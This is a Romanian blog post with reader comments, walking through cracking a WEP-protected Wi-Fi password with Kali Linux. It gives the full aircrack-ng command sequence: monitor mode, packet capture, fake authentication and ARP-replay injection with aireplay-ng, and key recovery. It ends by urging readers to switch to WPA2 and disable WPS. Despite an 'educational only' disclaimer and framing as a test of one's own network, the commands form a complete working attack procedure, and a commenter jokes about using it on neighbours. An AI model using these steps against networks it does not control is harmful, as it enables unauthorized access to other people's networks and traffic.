Pentru că parola criptată WEP poate fi aflată în doar câteva minute, extrem de simplu, atât din Linux cât și din Windows, fără prea multe bătăi de cap.
Faceți, din curiozitate sau măcar pentru a vă omorî timpul, următorul test.
Important!
Textul din acest articol este STRICT EDUCATIV și prin urmare SE INTERZICE utilizarea acestor informații în orice alt scop! Autorul acestui articol nu își asumă responsabilitatea pentru acțiunile sau rezultatele ilegale obtinute direct sau indirect de pe urma punerii în practică a informațiilor oferite în acesta! Continuând să citiți confirmați că SUNTEȚI DE ACORD cu aceste condiții și CONFIRMAȚI că VĂ ASUMAȚI ÎNTREAGA RESPONSABILITATE pentru punerea în aplicare a acestora!
Folosind Kali Linux, deschideți un terminal și identificați adaptorul wireless.
airmon-ng
Presupunând că adaptorul are id-ul wlan0, creați adaptorul virtual mon0 în mod monitor.
airmon-ng start wlan0
Rulați airodump-ng mon0 pentru a scana rețelele.
airodump-ng mon0
Identificați rețeaua voastră, protejată cu WEP. Apasati Ctrl+C. Rețineți din lista rețelelor detectate adresa MAC a routerului.
Capturați pachetele rețelei. Înlocuiți din comandă XX.XX…. cu adresa MAC a routerului, ZZ cu numărul canalului de operare a rețelei wireless, iar RRRR cu ESSID-ul rețelei (numele acesteia).
airodump-ng mon0 --bssid XX:XX:XX:XX:XX:XX -c ZZ -w RRRR
Porniți simultan o asociere bazată pe o autentificare falsă folosind aireplay-ng.
aireplay-ng -1 3 -a XX:XX:XX:XX:XX:XX mon0 --ignore-negative-one
Forțați nota pentru a injecta pachete ARP.
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0 --ignore-negative-one
După ce capturați cel puțin 20.000 de IVS-uri, opriți capturarea pachetelor (cu cât mai multe, cu atât mai bine). Eu am depășit cu mult această cantitate fiindcă am lăsat captura pornită și-am plecat la cumpărături. În doar o oră, se capturaseră deja 110972 IVS-uri.
Procesați-le cu aircrack-ng pentru a vedea dacă parola poate fi aflată prin intermediul acestora. Pentru asta, accesați folderul root și identificați fișierul nume_rețea-0.1.cap.
Tastați în Terminal comanda de mai jos și așteptați calcularea parolei.
aircrack-ng nume_rețea-0.1.cap
În doar câteva secunde, dacă a fost capturată o cantitatea suficientă de IVS-uri, aircrack-ng va afișa parola în HEX și ASCII.
Dacă există trafic pe rețea, adică dacă în acel moment cineva este conectat la ea și navighează pe Internet, capturarea pachetelor necesare se va face în cel mult 10 minute. În acest scop, pentru a grăbi procesul, conectați-vă la router prin wireless, de pe alt dispozitiv și navigați, redați un videoclip sau porniți un post de radio online.
Acestea fiind spuse, dacă încă vă protejați rețeaua wireless cu o parolă WEP, nu mai stați pe gânduri! Treceți la criptarea WPA2, de preferință WPA2-PSK (TKIP) și totodată dezactivați și WPS!
Am făcut de curiozitate o scanare a rețelelor din împrejurimi și am văzut asta. Nu-mi venea să cred cât de inconștienți și ignoranți sunt unii! Pe lângă câteva rețele care nu erau protejate deloc, existau multe altele „protejate” cu criptare wep. Mă întreb cum au decis respectivele persoane că wep e o variantă bună de a-și proteja rețeaua atunci când și-au instalat și configurat routerul!
De ce n-ar fi căutat pe Internet informații despre care este cea mai bună alegere dintre WEP și WPA habar n-am, dar sunt sigur că toți își verifică email-ul, contul de Facebook șamd. Cel mai amuzant e că fix acești oameni se plâng că Google îi spionează prin cookie-uri sau mai știu eu prin ce metode despre care au auzit la TV.
Profit de ocazie pentru a le face o ofertă tuturor vecinilor care mă citesc, inclusiv trolului de la 3 (da mane, te-am recunoscut chiar dacă te-ai chinuit să folosești un nickname elaborat), aceea de a le configura gratuit routerul în cazul în care ei nu se pricep să-i WPS-ul, configureze firewall-ul și să seteze o parolă WPA2 pentru rețeaua wireless.
foto | Michael Newman
urca, stii usa! dau si yo o bericioaica :P
Trebuie obligatoriu sa oprim capturarea pachetelor dupa ce s-a depasit minim 20000 data?Nu am inteles ultima comanda „aircrack-ng nume retea” ???
Nu. Cu cât mai multe, cu atât mai bine. Vezi imaginea de după. Rețeaua mea wireless se numește clsb.net, așadar, fișierul este clsb.net-0.1.cap, prin urmare și comanda va fi „aircrack-ng clsb.net-0.1.cap”
Am inteles acum,multumesc.
WirelessNetView de la NirSoft oferă o scanare rapidă a rețelelor din împrejurimi, cu multe alte informații, de la viteza router-ului până la adresa MAC sau tipul de criptare.
Nu m-am apucat încă să descarc Kali Linux (Kali maaaa, Kali maaaa) și să-mi hack-uiesc vecinii, dar informația e bine venită și foarte profi prezentată.
Mult mai complex e Vistumbler.
Cristiane, stii multe, vreau sa invat de la tine .
Mulțumesc! Well, e simplu: tot ce ai de făcut e să stai cu ochii pe blog. :)
Salut cristian.pot face asta cu telefonul?
Da, să puțin mai greu fiindcă routerul nu dispune de interfață pentru mobil.
Aș vrea să-ți cer o părere despre posibilitatea de renunțare la criptare deoarece se pierde ceva timp cu ea și înlocuirea acesteia cu o rețea invizibilă ,al cărei nume dacă nu-l cunoști nu o poți accesa.Numele acționează întocmai ca o parolă.
Nu e o practica bună. 1 la mână, rețeaua este afișată de scanere și 2, în doar câteva secunde poți afla numele rețelei.